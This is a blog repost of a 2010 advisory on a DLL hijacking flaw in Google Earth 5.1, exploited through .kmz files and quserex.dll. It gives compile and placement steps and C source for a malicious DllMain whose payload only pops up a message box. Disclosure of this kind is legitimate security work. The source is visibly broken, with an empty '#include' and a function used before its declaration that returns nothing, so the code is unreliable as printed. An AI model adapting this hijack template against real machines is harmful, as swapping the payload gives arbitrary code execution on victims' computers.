6 Eylül 2010 Pazartesi

Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

/*

 
 Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit
 
 Vendor: Google Inc.
 Product Web Page: http://www.google.com
 Affected Version: 5.1.3535.3218
 
 Summary: Google Earth lets you fly anywhere on Earth to view
 satellite imagery, maps, terrain, 3D buildings, from galaxies
 in outer space to the canyons of the ocean. You can explore
 rich geographical content, save your toured places, and share
 with others.
 
 Desc: Google Earth suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local
 level. The vulnerable extension is .kmz thru quserex.dll and
 wintab32.dll libraries.
 
 ----
 gcc -shared -o quserex.dll googlee.c
 
 Compile and rename to quserex.dll, create a file test.kmz and put
 both files in same dir and execute.
 ----
 
 Tested on Microsoft Windows XP Professional SP3 (EN)
 
 
 
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com
 
 Zero Science Lab - http://www.zeroscience.mk
 
 
 25.08.2010
 
*/
 
 
#include
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_mll();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
 
    return TRUE;
}
 
int dll_mll()
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

0 yorum :

Yorum Gönder